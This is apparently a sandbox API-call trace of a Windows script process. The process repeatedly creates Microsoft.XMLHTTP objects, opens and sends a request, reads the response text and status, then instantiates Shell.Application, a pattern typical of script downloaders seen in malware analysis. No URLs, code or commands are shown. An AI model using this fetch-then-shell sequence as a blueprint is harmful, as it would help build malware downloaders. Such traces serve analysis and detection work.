	[0275.141] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0275.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0275.141] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0275.141] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0275.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0275.141] ??2@YAPEAX_K@Z () returned 0x62f330
	[0275.141] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0275.141] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0275.141] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0275.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0275.141] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0275.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.142] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0275.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.142] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0275.142] SysStringLen (param_1=0x0) returned 0x0
	[0275.142] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0275.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0275.142] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0275.142] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0275.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0275.142] ??2@YAPEAX_K@Z () returned 0x62f310
	[0275.142] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f310) 
	[0275.142] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0275.143] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0275.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0275.143] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0275.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.143] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0275.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.143] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0275.143] SysStringLen (param_1=0x0) returned 0x0
	[0275.143] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0275.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0275.143] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0275.143] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0275.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0275.144] ??2@YAPEAX_K@Z () returned 0x62f330
	[0275.144] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0275.144] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0275.144] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0275.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0275.144] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0275.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.144] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0275.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.144] longjmp () 
	[0275.144] longjmp () 
	[0275.144] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0275.144] SysStringLen (param_1=0x0) returned 0x0
	[0275.145] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0275.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0275.145] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0275.145] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0275.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0275.145] ??2@YAPEAX_K@Z () returned 0x62f310
	[0275.145] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0275.145] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0275.145] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0275.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0275.145] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0275.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.145] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0275.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.146] longjmp () 
	[0275.146] longjmp () 
	[0275.146] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0275.146] SysStringLen (param_1=0x0) returned 0x0
	[0275.146] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0275.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0275.146] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0275.146] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0275.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0275.146] ??2@YAPEAX_K@Z () returned 0x62f330
	[0275.146] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0275.146] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0275.146] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0275.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0275.146] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0275.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.147] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0275.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0275.147] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0275.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0275.323] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0275.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0275.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0275.323] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0275.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0275.323] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0275.323] SysStringLen (param_1=0x0) returned 0x0
	[0275.323] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0275.324] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0275.324] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0275.324] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0275.324] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0275.324] ??2@YAPEAX_K@Z () returned 0x62f350
	[0275.324] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0275.324] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0275.324] Shell:IUnknown:Release (This=0x396800) returned 0x1
